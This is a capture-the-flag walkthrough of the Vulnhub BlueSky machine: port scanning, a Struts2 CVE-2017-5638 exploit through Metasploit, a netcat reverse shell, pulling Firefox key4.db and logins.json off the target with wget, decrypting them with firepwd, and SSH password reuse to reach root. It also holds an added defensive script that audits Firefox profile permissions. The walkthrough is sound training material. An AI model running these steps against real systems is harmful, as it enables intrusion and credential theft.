BlueSky Walkthrough – Vulnhub – Writeup


BlueSky is an easy machine from Vulnhub that requires a bit of initial enumeration. However, upon getting the foothold, this machine isn’t that difficult. Also, this machine worked in VMware but not in VirtualBox for me. I have taken the reference for the foothold from Proxy Programmer’s video. You can check it at the end of this blog post.

Link to the machine: https://www.vulnhub.com/entry/bluesky-1,623/


Identify the target

First of all, since we are working in a virtual environment, we have to identify the IP address of the target machine.

sudo netdiscover -r 192.168.19.0/24
Target IP address: 192.168.19.147

Scan open ports

Next, we have to look for the open ports on the target machine.

nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.147
Nmap scan results

We can see from the screenshot above that we have an Apache Tomcat server running on the target.

Enumerate tomcat server

This is the part where I really couldn’t get anything from the Tomcat server. However, from Proxy Programmer’s video, I gathered that we need to guess related frameworks. Also, when I searched for tomcat on Metasploit, I got a result for Struts, which is a framework for Java EE. With the help of Proxy Programmer’s video, I identified that the vulnerability is in the Struts2 framework.

Github Link: https://github.com/jrrdev/cve-2017-5638/blob/master/exploit/exploit.py

The above exploit works on Python 2 only. However, I will be using the Metasploit framework for getting a reverse shell.

msfconsole command history

Although it said that the exploit failed, we have a session running in the background.

Session in background

Since we have a session in the background, I decided to spawn another reverse shell in my bash as Metasploit shells aren’t as stable.

nc -nlvp 9001
Spawned a reverse shell from Metasploit
Got a reverse shell

Escalate privileges

Next, I upgraded the reverse shell. For more information, check my other blog post.

Upgrade to an intelligent reverse shell

.mozilla directory
key4.db and logins.json

Since we have the key4.db and logins.json files, we can decrypt the password using the firepwd tool. For that, we have to transfer these two files to my local machine.

# On the target machine
python3 -m http.server
# On my local machine
wget http://192.168.19.147:8000/key4.db
wget http://192.168.19.147:8000/logins.json

Github link to Firepwd: https://github.com/lclevy/firepwd

We have to install the required packages and then put these two files in the same directory where firepwd.py resides.

python3 firepwd.py

We got a Twitter password.

Twitter password

Then, when I checked for password reuse by logging into the SSH service, it worked.

SSH Login
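
From the defender's side, the step above works because a Firefox profile keeps logins.json next to key4.db where the compromised account can read both. The following audit script is an added example, not part of the original walkthrough or of firepwd; the function names, the profile name abcd1234.default and the example.test host are constructed for illustration. It only reports which profiles hold saved logins and whether the files are readable by other accounts, and it does not decrypt anything.

```python
import json, os, stat, tempfile
from pathlib import Path

def other_can_read(path, root):
    """True if non-owner accounts can read `path` (file read bit, directory search bits)."""
    if not path.stat().st_mode & stat.S_IROTH:
        return False
    d = path.parent
    while d != root and d != d.parent:
        if not d.stat().st_mode & stat.S_IXOTH:
            return False
        d = d.parent
    return True

def audit_firefox_profiles(root):
    """List Firefox profiles under `root` that store logins next to key4.db."""
    root, findings = Path(root), []
    for logins in sorted(root.rglob("logins.json")):
        key_db = logins.parent / "key4.db"
        if not key_db.is_file():
            continue  # no key database beside it, so nothing to decrypt offline
        try:
            entries = json.loads(logins.read_text(encoding="utf-8")).get("logins", [])
        except (OSError, ValueError, AttributeError):
            continue  # unreadable, or not a Firefox login store
        if entries:
            findings.append({
                "profile": str(logins.parent),
                "sites": sorted({e.get("hostname", "?") for e in entries}),
                "exposed": other_can_read(logins, root) and other_can_read(key_db, root),
            })
    return findings

def build_sample(root, file_mode):
    """Constructed sample data: one profile holding a single saved login."""
    profile = Path(root) / ".mozilla" / "firefox" / "abcd1234.default"
    profile.mkdir(parents=True)
    for d in (profile, profile.parent, profile.parent.parent):
        os.chmod(d, 0o755)
    entry = {"id": 1, "hostname": "https://example.test",
             "encryptedUsername": "CONSTRUCTED", "encryptedPassword": "CONSTRUCTED"}
    (profile / "logins.json").write_text(json.dumps({"nextId": 2, "logins": [entry]}))
    (profile / "key4.db").write_bytes(b"constructed placeholder, not a real NSS database")
    for name in ("logins.json", "key4.db"):
        os.chmod(profile / name, file_mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp, 0o644)
        print(audit_firefox_profiles(tmp))
```

Run against /home on a real host, any profile reported with "exposed": True is a candidate for tightening permissions, and any saved site whose password is reused for a system account is worth rotating.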

Now, let’s check the sudo permissions.

sudo permissions

We can see that the user has all permissions and we can now switch to root.

Root access

Walkthrough by Proxy Programmer

Walkthrough of Proxy Programmer